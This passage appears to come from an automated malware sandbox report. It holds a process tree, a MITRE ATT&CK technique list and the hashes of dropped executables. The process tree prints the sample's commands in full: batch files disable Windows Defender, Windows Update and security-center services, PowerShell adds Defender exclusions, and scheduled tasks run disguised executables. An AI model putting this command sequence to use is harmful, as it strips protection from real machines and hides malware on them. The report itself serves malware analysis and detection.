"C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\test.bat"
3⤵
PID:4956

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
PID:6788

C:\Windows\system32\sc.exe
sc config windefend start= disabled
4⤵
- Checks for any installed AV software in registry
PID:7044

C:\Windows\system32\sc.exe
sc stop Sense
4⤵
PID:6616

C:\Windows\system32\sc.exe
sc config Sense start= disabled
4⤵
PID:3808

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:7132

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:900

C:\Windows\system32\sc.exe
sc stop usosvc
4⤵
PID:6672

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
4⤵
PID:6392

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
4⤵
PID:6152

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
4⤵
PID:6792

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
4⤵
PID:5248

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
4⤵
PID:1840

C:\Windows\system32\sc.exe
sc stop SDRSVC
4⤵
PID:2020

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
4⤵
PID:6064

C:\Windows\system32\sc.exe
sc stop wscsvc
4⤵
PID:5284

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
4⤵
PID:6116

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
4⤵
PID:6080

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
4⤵
PID:6600

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
4⤵
PID:6696

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
4⤵
PID:6904

C:\Windows\system32\sc.exe
sc stop InstallService
4⤵
PID:5564

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
4⤵
PID:6228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8D5F.exe" -Force
2⤵
PID:4072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
- Suspicious behavior: MapViewOfSection
PID:2160

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:988

C:\Users\Admin\AppData\Local\Temp\8D5F.exe
"C:\Users\Admin\AppData\Local\Temp\8D5F.exe"
2⤵
PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 2068
2⤵
- Program crash
PID:4308

C:\Users\Admin\AppData\Local\Temp\8FB2.exe
C:\Users\Admin\AppData\Local\Temp\8FB2.exe
1⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\1858561392.exe
"C:\Users\Admin\AppData\Local\Temp\1858561392.exe"
2⤵
PID:5968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
3⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\1676891015.exe
"C:\Users\Admin\AppData\Local\Temp\1676891015.exe"
2⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\1676891015.exe
"C:\Users\Admin\AppData\Local\Temp\1676891015.exe"
3⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\938B.exe
C:\Users\Admin\AppData\Local\Temp\938B.exe
1⤵
PID:6828

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6040

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2292

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7160

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1704

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6084

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5912

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4592

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5492

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3956

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\1A7F.exe
C:\Users\Admin\AppData\Local\Temp\1A7F.exe
1⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1c71b789-1555-41ac-b6bf-f2665df4e327\test.bat"
3⤵
PID:5820

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
PID:6624

C:\Windows\system32\sc.exe
sc config windefend start= disabled
4⤵
PID:6332

C:\Windows\system32\sc.exe
sc stop Sense
4⤵
PID:5568

C:\Windows\system32\sc.exe
sc config Sense start= disabled
4⤵
PID:5732

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:6296

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:5840

C:\Windows\system32\sc.exe
sc stop usosvc
4⤵
PID:4644

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
4⤵
PID:1840

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
4⤵
PID:5564

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
4⤵
PID:5992

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
4⤵
PID:2248

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
4⤵
PID:5520

C:\Windows\system32\sc.exe
sc stop SDRSVC
4⤵
PID:2812

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
4⤵
PID:7008

C:\Windows\system32\sc.exe
sc stop wscsvc
4⤵
PID:4672

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
4⤵
PID:2136

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
4⤵
PID:7048

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
4⤵
PID:2180

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
4⤵
PID:4244

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
4⤵
PID:4708

C:\Windows\system32\sc.exe
sc stop InstallService
4⤵
PID:7060

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
4⤵
PID:6468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1A7F.exe" -Force
2⤵
PID:4252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:5544

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5328

C:\Users\Admin\AppData\Local\Temp\1A7F.exe
"C:\Users\Admin\AppData\Local\Temp\1A7F.exe"
2⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\1A7F.exe
"C:\Users\Admin\AppData\Local\Temp\1A7F.exe"
2⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1A7F.exe"
3⤵
PID:6424

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:900

C:\Users\Admin\AppData\Local\Temp\1B99.exe
C:\Users\Admin\AppData\Local\Temp\1B99.exe
1⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:3324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\test.bat"
3⤵
PID:6840

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
PID:2780

C:\Windows\system32\sc.exe
sc config windefend start= disabled
4⤵
PID:5152

C:\Windows\system32\sc.exe
sc stop Sense
4⤵
PID:4480

C:\Windows\system32\sc.exe
sc config Sense start= disabled
4⤵
PID:6348

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:3568

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:5428

C:\Windows\system32\sc.exe
sc stop usosvc
4⤵
PID:4896

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
4⤵
PID:5944

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
4⤵
PID:6356

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
4⤵
PID:7004

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
4⤵
PID:4408

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
4⤵
PID:5860

C:\Windows\system32\sc.exe
sc stop SDRSVC
4⤵
PID:1644

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
4⤵
PID:3996

C:\Windows\system32\sc.exe
sc stop wscsvc
4⤵
PID:3808

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
4⤵
PID:7140

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
4⤵
PID:6920

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
4⤵
PID:5148

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
4⤵
PID:6696

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
4⤵
PID:5456

C:\Windows\system32\sc.exe
sc stop InstallService
4⤵
PID:4876

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
4⤵
PID:4536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1B99.exe" -Force
2⤵
PID:5152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:6032

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5616

C:\Users\Admin\AppData\Local\Temp\1B99.exe
"C:\Users\Admin\AppData\Local\Temp\1B99.exe"
2⤵
PID:6260

C:\Users\Admin\AppData\Local\Temp\1B99.exe
"C:\Users\Admin\AppData\Local\Temp\1B99.exe"
2⤵
PID:5824

C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
"C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
3⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4⤵
PID:5160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\test.bat"
5⤵
PID:6612

C:\Windows\system32\sc.exe
sc stop windefend
6⤵
PID:4708

C:\Windows\system32\sc.exe
sc config windefend start= disabled
6⤵
PID:5140

C:\Windows\system32\sc.exe
sc stop Sense
6⤵
PID:5960

C:\Windows\system32\sc.exe
sc config Sense start= disabled
6⤵
PID:5320

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
PID:4688

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
6⤵
PID:964

C:\Windows\system32\sc.exe
sc stop usosvc
6⤵
PID:6844

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
6⤵
PID:7076

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
6⤵
PID:4760

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
6⤵
PID:6836

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
6⤵
PID:3896

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
6⤵
PID:4300

C:\Windows\system32\sc.exe
sc stop SDRSVC
6⤵
PID:7128

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
6⤵
PID:5852

C:\Windows\system32\sc.exe
sc stop wscsvc
6⤵
PID:6660

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
6⤵
PID:3652

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
6⤵
PID:3008

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
6⤵
PID:4128

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
6⤵
PID:6324

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
6⤵
PID:3324

C:\Windows\system32\sc.exe
sc stop InstallService
6⤵
PID:5744

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
6⤵
PID:7032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" -Force
4⤵
PID:6920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
4⤵
PID:6248

C:\Windows\SysWOW64\timeout.exe
timeout 1
5⤵
- Delays execution with timeout.exe
PID:1136

C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
"C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
4⤵
PID:200

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 01:25 /du 23:59 /sc daily /ri 1 /f
3⤵
- Creates scheduled task(s)
PID:5992

C:\Users\Admin\AppData\Local\Temp\1B99.exe
"C:\Users\Admin\AppData\Local\Temp\1B99.exe"
2⤵
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 2096
2⤵
- Program crash
PID:3888

C:\Users\Admin\AppData\Local\Temp\1DAE.exe
C:\Users\Admin\AppData\Local\Temp\1DAE.exe
1⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\test.bat"
3⤵
PID:6360

C:\Windows\system32\sc.exe
sc stop windefend
4⤵
PID:6804

C:\Windows\system32\sc.exe
sc config windefend start= disabled
4⤵
PID:6768

C:\Windows\system32\sc.exe
sc stop Sense
4⤵
PID:5008

C:\Windows\system32\sc.exe
sc config Sense start= disabled
4⤵
PID:6972

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
PID:2160

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
4⤵
PID:6120

C:\Windows\system32\sc.exe
sc stop usosvc
4⤵
PID:6428

C:\Windows\system32\sc.exe
sc config usosvc start= disabled
4⤵
PID:6976

C:\Windows\system32\sc.exe
sc stop WaasMedicSvc
4⤵
PID:5424

C:\Windows\system32\sc.exe
sc config WaasMedicSvc start= disabled
4⤵
PID:5872

C:\Windows\system32\sc.exe
sc stop SecurityHealthService
4⤵
PID:2884

C:\Windows\system32\sc.exe
sc config SecurityHealthService start= disabled
4⤵
PID:5700

C:\Windows\system32\sc.exe
sc stop SDRSVC
4⤵
PID:6284

C:\Windows\system32\sc.exe
sc config SDRSVC start= disabled
4⤵
PID:1200

C:\Windows\system32\sc.exe
sc stop wscsvc
4⤵
PID:5756

C:\Windows\system32\sc.exe
sc config wscsvc start= disabled
4⤵
PID:4116

C:\Windows\system32\sc.exe
sc stop WdiServiceHost
4⤵
PID:6320

C:\Windows\system32\sc.exe
sc config WdiServiceHost start= disabled
4⤵
PID:5004

C:\Windows\system32\sc.exe
sc stop WdiSystemHost
4⤵
PID:6152

C:\Windows\system32\sc.exe
sc config WdiSystemHost start= disabled
4⤵
PID:4620

C:\Windows\system32\sc.exe
sc stop InstallService
4⤵
PID:5788

C:\Windows\system32\sc.exe
sc config InstallService Start= disabled
4⤵
PID:6440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1DAE.exe" -Force
2⤵
PID:6712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:5976

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:4636

C:\Users\Admin\AppData\Local\Temp\1DAE.exe
"C:\Users\Admin\AppData\Local\Temp\1DAE.exe"
2⤵
PID:5732

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
3⤵
- Creates scheduled task(s)
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 2080
2⤵
- Program crash
PID:6296

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

BITS Jobs

T1197

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

BITS Jobs

T1197

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

T1012

System Information Discovery

T1082

Security Software Discovery

T1063

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
MD5
c7dc028b47ab92ca5453f939825cf367

SHA1
e13033f7711de668b09ca555df985cb62e56d12e

SHA256
9f34d20254c87d8f9c732df75eb5b707c41fd6cd5153f5e4733a0126ed304f0d

SHA512
49f9db82dbc9be1a00605d20c576dd56284cb734e4468bb693506112f0b03ca4c8f204b1d3a41c6527779e8871b182975477cf996567a4617eae695053f0fd0a

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
MD5
c7dc028b47ab92ca5453f939825cf367

SHA1
e13033f7711de668b09ca555df985cb62e56d12e

SHA256
9f34d20254c87d8f9c732df75eb5b707c41fd6cd5153f5e4733a0126ed304f0d

SHA512
49f9db82dbc9be1a00605d20c576dd56284cb734e4468bb693506112f0b03ca4c8f204b1d3a41c6527779e8871b182975477cf996567a4617eae695053f0fd0a

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
MD5
d2f9b038e689ac9fc99352bd766690e4

SHA1
19380ac92419895626cc9b9d7b6ecdd183a81e30

SHA256
8b6be03e0a14f193dd33c6dfdc1a1c27d3d59044ea246b3a12eb4a7d790dd4ed

SHA512
0d9b801661eea6c0499b46e8acc929196bf8130d989bb4e5e8d94c19bef3412c4c43b9c232f462a4c28a90786c6af21bfd2d8d611e3b7820b5c7a01e668ce3eb

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
MD5
d2f9b038e689ac9fc99352bd766690e4

SHA1
19380ac92419895626cc9b9d7b6ecdd183a81e30

SHA256
8b6be03e0a14f193dd33c6dfdc1a1c27d3d59044ea246b3a12eb4a7d790dd4ed

SHA512
0d9b801661eea6c0499b46e8acc929196bf8130d989bb4e5e8d94c19bef3412c4c43b9c232f462a4c28a90786c6af21bfd2d8d611e3b7820b5c7a01e668ce3eb

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LOQn7WyBrhly.exe
MD5
054daf924a5537dea562d6b1bea7ebd7

SHA1
5ca2df89fa45d5fe8544033cad2e5116417761b6

SHA256
4a136b737d9e08d4d04f661f050447f5a2ef4c2d1834e434f3bcaf2b85526175

SHA512
a118c2a0d4056d611c90d9c16bafde79799afdba01adcf905c8c044facf78ed36e630e6bda8323c23a7331a14cf15a2a3c9226fb3e559e466896123c025b8e25

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LOQn7WyBrhly.exe
MD5
054daf924a5537dea562d6b1bea7ebd7

SHA1
5ca2df89fa45d5fe8544033cad2e5116417761b6

SHA256
4a136b737d9e08d4d04f661f050447f5a2ef4c2d1834e434f3bcaf2b85526175

SHA512
a118c2a0d4056d611c90d9c16bafde79799afdba01adcf905c8c044facf78ed36e630e6bda8323c23a7331a14cf15a2a3c9226fb3e559e466896123c025b8e25

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
MD5
a5e356d8cc0b55e0653d995a626fae90

SHA1
5515b37818785b96218880d199144336f8f3d962

SHA256
6cae92665b23b4bccccd25fad925b745ad83e700b1775a6cabae079b5741accd

SHA512
e425a5f6ede8f57529fe88ab2cc04cd614d8286d0447ad48701747fec8b8b9a7aa68b9d3fabad026e3943aa74e6a8c9037cb81af069fe3bf1ab05e54cfa9b935

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
MD5
a5e356d8cc0b55e0653d995a626fae90

SHA1
5515b37818785b96218880d199144336f8f3d962

SHA256
6cae92665b23b4bccccd25fad925b745ad83e700b1775a6cabae079b5741accd

SHA512
e425a5f6ede8f57529fe88ab2cc04cd614d8286d0447ad48701747fec8b8b9a7aa68b9d3fabad026e3943aa74e6a8c9037cb81af069fe3bf1ab05e54cfa9b935

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
MD5
9af6219e731b854966b85d001c4b5148

SHA1
ca7112b83f69c7624f662db47cfd3a0e9b161654

SHA256
b130e4f675b2ef7722dbfa22c9491cd1077af47957c0411c4d6a8e3d4f8b2620

SHA512
f460e73eb23004d41bca4bbe960cc1775e6f815ecd480ff85e65286b35c18824be6e1ff9300963eef74a4032e98b16e705f44aa9212634d1afa17137433275be

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
MD5
9af6219e731b854966b85d001c4b5148

SHA1
ca7112b83f69c7624f662db47cfd3a0e9b161654

SHA256
b130e4f675b2ef7722dbfa22c9491cd1077af47957c0411c4d6a8e3d4f8b2620

SHA512
f460e73eb23004d41bca4bbe960cc1775e6f815ecd480ff85e65286b35c18824be6e1ff9300963eef74a4032e98b16e705f44aa9212634d1afa17137433275be

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
MD5
eceff2a609e8a7e4fd459a38f28e5148

SHA1
ca07579aa9c9b0a95bf757d40a77fb9ed591adbf

SHA256
61935cfb53dcf1cd5a8c7c8449daf78f68ab53243fca0e715f7eb0940155acfe

SHA512
08cd0776a05fb756443c51a2af38f0811e20ff0151f14c75b2720471527a11f5d70359f802ca2e8a62dfbb6aeed9a1fef0c23b0ff7631844ae7208cd95293f8a

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
MD5
eceff2a609e8a7e4fd459a38f28e5148

SHA1
ca07579aa9c9b0a95bf757d40a77fb9ed591adbf

SHA256
61935cfb53dcf1cd5a8c7c8449daf78f68ab53243fca0e715f7eb0940155acfe

SHA512
08cd0776a05fb756443c51a2af38f0811e20ff0151f14c75b2720471527a11f5d70359f802ca2e8a62dfbb6aeed9a1fef0c23b0ff7631844ae7208cd95293f8a

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
MD5
300955d4464b65c8e70e69aed0d349c4

SHA1
5c3c55482549c07d3be6f52f92291bdcec365465

SHA256
483d120901c099b3004dd2b287e3f376cd0a70ba60ad173c6fdc964a19f5c242

SHA512
a8ae18177f4331a2e7e404e9ebf3d4b341a16b77759cc0bd3a694320449c55973f6b7985f50a17fc7f8d83ba3ef57c26f4b0db144a05d098a161073efc7725f9

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
MD5
300955d4464b65c8e70e69aed0d349c4

SHA1
5c3c55482549c07d3be6f52f92291bdcec365465

SHA256
483d120901c099b3004dd2b287e3f376cd0a70ba60ad173c6fdc964a19f5c242

SHA512
a8ae18177f4331a2e7e404e9ebf3d4b341a16b77759cc0bd3a694320449c55973f6b7985f50a17fc7f8d83ba3ef57c26f4b0db144a05d098a161073efc7725f9

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
MD5
0a427bb1c7e314e0225d73690ae697ee

SHA1
34e83125b0a48abebd6ebc1292b5baa0a697c846

SHA256
0d0f05d54c10ee2c1dad908972bbec3427ebbe2c15d2e73ad1c1aed9572eb93c

SHA512
245f9733a8c6bf64372fa42c21bf5b4ccf89099566a528f8f8bc7c9f574e985a682a9f51d41ee5fdc876684843d9e8849cc455ad3de066101840e70106340ae9

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
MD5
0a427bb1c7e314e0225d73690ae697ee

SHA1
34e83125b0a48abebd6ebc1292b5baa0a697c846

SHA256
0d0f05d54c10ee2c1dad908972bbec3427ebbe2c15d2e73ad1c1aed9572eb93c

SHA512
245f9733a8c6bf64372fa42c21bf5b4ccf89099566a528f8f8bc7c9f574e985a682a9f51d41ee5fdc876684843d9e8849cc455ad3de066101840e70106340ae9

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
MD5
36ba42b02621b4dae2335286fbea60d8

SHA1
5cec6fe37a4cfba188328ae4d328d938ab33c647

SHA256
58aaf8e5a42a7e06df4a9b179a495d8dde5f657d47fd81fbb2234f3457af3d24

SHA512
ad6cf15728f84f5fafddc3c350fcf387e406b51fc2217d2e1d032c8d30cd0a895af736c1b4b309152c4a429cd33d0b92403d75c8dae0cb093dd507f3368617bc

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
MD5
36ba42b02621b4dae2335286fbea60d8

SHA1
5cec6fe37a4cfba188328ae4d328d938ab33c647

SHA256
58aaf8e5a42a7e06df4a9b179a495d8dde5f657d47fd81fbb2234f3457af3d24

SHA512
ad6cf15728f84f5fafddc3c350fcf387e406b51fc2217d2e1d032c8d30cd0a895af736c1b4b309152c4a429cd33d0b92403d75c8dae0cb093dd507f3368617bc

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
MD5
5d26d0386032fc7572ae05b2250aa929

SHA1
fac05348d973dee4ca7ccddd578d9849237b6700

SHA256
f2d5134592f0824332a666e93dad4612289077bb6bd6d961993d1322d2396918

SHA512
ad0c5936ad06dcca36b49a98f7306cb224ca4045e720300a739af44982ad91a0ba47995971220efa940c5522447d64772416cc0f481839612fdb707d1cfad166

Download Submit
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
MD5
5d26d0386032fc7572ae05b2250aa929

SHA1
fac05348d973dee4ca7ccddd578d9849237b6700

SHA256
